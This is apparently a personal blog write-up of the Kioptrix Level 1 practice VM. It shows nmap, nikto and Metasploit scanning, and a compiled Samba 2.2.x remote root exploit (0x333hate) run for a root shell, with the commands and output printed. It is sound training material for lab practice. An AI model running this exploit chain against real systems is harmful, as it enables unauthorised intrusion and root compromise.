Kioptrix: Level 1

February 15, 2015

This is my write up for Kioptrix 1, the first VM in the kioptrix series by @loneferret. It is available for downlolad from Vulnhub or the Kioptrix website.

First of all I started with an nmap scan:

1
2
3
4
5
6
7
8
9
root@kali:~# nmap -sV -n -Pn -oA scans/nmap 10.1.1.30

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)

I saw that ports 80 and 443 were open so decided to browse to them both, but they displayed nothing but default apache screens, so I decided to run nikto against both ports to see what I could find.

nikto -host 10.1.1.30 -port 80 and nikto -host 10.1.1.30 -port 443

Once nikto had finished I had a look through both the results:

1
2
3
4
5
6
7
8
9
+ Target Host: 10.1.1.30
+ Target Port: 80
+ OSVDB-4552: GET Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: GET Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ GET mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-682: GET /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3268: GET /manual/: Directory indexing found.
+ OSVDB-3092: GET /manual/: Web server manual found.
+ OSVDB-3268: GET /icons/: Directory indexing found.
1
2
3
4
5
6
7
8
9
+ Target Host: 10.1.1.30
+ Target Port: 443
+ OSVDB-4552: GET Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: GET Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ GET mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-682: GET /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3268: GET /manual/: Directory indexing found.
+ OSVDB-3092: GET /manual/: Web server manual found.
+ OSVDB-3268: GET /icons/: Directory indexing found.

They both came back the same. I had a quick look at http://10.1.1.30/usage but it just displayed diffrent usage information about the system. In http://10.1.1.30/manual though there were some files, mod_perl and mod_ssl. I had a quick look online and after a bit of digging chose not to look too deeply at these and to come back later.

So next I had a look for exploits for apache/mod_ssl/OpenSSL and came across an OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability, but after downloading and appling the nessasary fixes. I still was not able to get the exploit to work. Which then lead me to samba…

I couln’t find the version using nmap, so I decided to give metasploits smb_version scanner a go.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS                      yes       The target address range or CIDR identifier
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass                     no        The password for the specified username
SMBUser                     no        The username to authenticate as
THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 10.1.1.30
RHOSTS => 10.1.1.30
msf auxiliary(smb_version) > run

[*] 10.1.1.30:139 could not be identified: Unix (Samba 2.2.1a)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So I had a quick look for an exploit for Samba 2.2.1a and found a Samba remote root exploit which lead me to 0x333hate.c.

So I downloaded, compiled gcc -o 0x333hate 0x333hate.c and used the exploit ./0x333hate -t 10.1.1.30 -p 139 and as easy as that I had root:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# ./0x333hate -t 10.1.1.30 -p 139

[~] 0x333hate => samba 2.2.x remote root exploit [~]
[~]        coded by c0wboy ~ www.0x333.org       [~]

[-] connecting to 10.1.1.30:139
[-] stating bruteforce

[-] testing 0xbfffffff
[-] testing 0xbffffdff
[-] testing 0xbffffbff
[-] testing 0xbffff9ff
[-] testing 0xbffff7ff
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

Next all I had to do was read the email at /var/spool/mail/root and I was done!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat /var/spool/mail/root

From root  Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

It was a fun and relatively quick challenge, if you are looking for more VMs to have a go at, the rest on the Kioptrix series and many more VMs are available on the Vulnhub website.

How to import the top-hat-sec VMs into VMware

This is a short ‘How-To’ on how to import the [Top-Hat-Sec VMs](https://www.vulnhub.com/series/tophatsec,62/)hosted on VulnHub into VMware …… Continue reading

kioptrix level 2

Published on March 14, 2015

DE-ICE: S1.100

Published on February 04, 2015